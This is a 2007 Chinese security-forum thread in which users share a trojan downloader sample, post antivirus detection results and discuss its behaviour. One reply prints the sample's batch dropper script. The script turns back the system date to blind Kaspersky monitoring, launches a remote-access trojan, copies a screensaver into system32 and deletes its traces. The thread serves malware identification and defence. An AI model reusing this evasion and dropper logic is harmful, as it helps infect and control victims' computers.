查看: 2627|回复: 12
收起左侧

[病毒样本] MD5: CDEC3F

[复制链接]
自由
发表于 2007-8-30 00:13:16 | 显示全部楼层 |阅读模式
ClamAV 0.91.141062007-08-29Trojan.Crypted-4
0.461
IKARUST3.1.1.122007.08.28.694132007-08-28suspicious(level 160)
1.370
NOD322.70.824902007-08-29probably unknown NewHeur_PE virus
0.023
QuickHeal9.002007.08.282007-08-28Suspicious - DNAScan
2.287
SOPHOS2.49.14.212007-08-29Mal/Emogen-B
2.323
VBA323.12.2.320070828.07582007-08-28Embedded.Trojan-Downloader.Win32.Banload.awy (suspicious)
0.751
VirusBuster4.3.19:99.099.8/11.02007-08-28Packed/FSG
0.967
小红伞7.4.1.666.39.1.602007-08-29TR/Crypt.ULPM.Gen
2.424
熊猫卫士9.04.03.00012007.08.282007-08-28Suspicious file无敌
3.098
诺曼5.91.045.902007-08-29Suspicious_F.gen
2.911
迈克菲5.1.0051072007-08-28New Malware.cj
1.020

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
uhthn2002
发表于 2007-8-30 00:17:48 | 显示全部楼层
Uhthn Anti-Spyware V3 Alpha
Version - 3.0.0
Heuristics - OPEN
Scan in - C:\Documents and Settings\uhthn\Desktop\virus

C:\Documents and Settings\uhthn\Desktop\virus\象.exe - Suspicious of Trojan-PSW.Game.2

1 Files scanned
0 Infected files found
1 Suspicious files found
0 Files cured
0 Files deleted
浪滔天
发表于 2007-8-30 00:21:41 | 显示全部楼层
卡巴 7.0.0.125 扫描飘过

好像是修改系统时间的,运行后文件自动删除。

[ 本帖最后由 浪滔天 于 2007-8-30 00:23 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
1p1
发表于 2007-8-30 00:22:36 | 显示全部楼层
Downloader
1p1
发表于 2007-8-30 00:23:05 | 显示全部楼层
原帖由 浪滔天 于 2007-8-30 00:21 发表
卡巴 7.0.0.125 扫描飘过

好像是修改系统时间的,运行后文件自动删除。

::======修改系统时间使卡巴监控失效============
date 1980-01-01
date 1980-01-01
::======运行表面程序==========================
%systemroot%\temp\1.bmp
::========倒计时等待10秒======================
@echo off & setlocal enableextensions
echo WScript.Sleep 1000 > %temp%.\tmp$$$.vbs
set /a i = 5
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo %temp%.\tmp$$$.vbs
goto Timeout
goto End
::===========倒计时等待结束运行鸽子=============
:Next
%systemroot%\temp\system.exe
copy %systemroot%\temp\mv.SCR %systemroot%\system32\
for %%f in (%temp%.\tmp$$$.vbs*) do del %%f
::======恢复时间(卡巴监控)=======================
::=========清除痕迹============================
RD /S /Q %systemroot%\temp\
hlm444
发表于 2007-8-30 00:24:15 | 显示全部楼层
大蜘蛛不报
NOD报了 
浪滔天
发表于 2007-8-30 00:26:32 | 显示全部楼层
原帖由 1p1 于 2007-8-30 00:23 发表

::======修改系统时间使卡巴监控失效============
date 1980-01-01
date 1980-01-01
::======运行表面程序==========================
%systemroot%\temp\1.bmp
::========倒计时等待10秒============== ...

不过我安装了360时间防改保护,没中招
自由
 楼主| 发表于 2007-8-30 00:38:04 | 显示全部楼层

回复 #7 浪滔天 的帖子

中毒可不要怪我,我无心害人的,我发病毒,就是希望少点人中毒,大家运行时自己小心点。。。
浪滔天
发表于 2007-8-30 00:47:53 | 显示全部楼层
原帖由 自由 于 2007-8-30 00:38 发表
中毒可不要怪我,我无心害人的,我发病毒,就是希望少点人中毒,大家运行时自己小心点。。。

呵呵,放心好了,愿者才上钩~
king6808
发表于 2007-8-31 18:21:04 | 显示全部楼层
Win32.Banload.awy
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-3-1 13:43 , Processed in 0.082196 second(s), 2 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表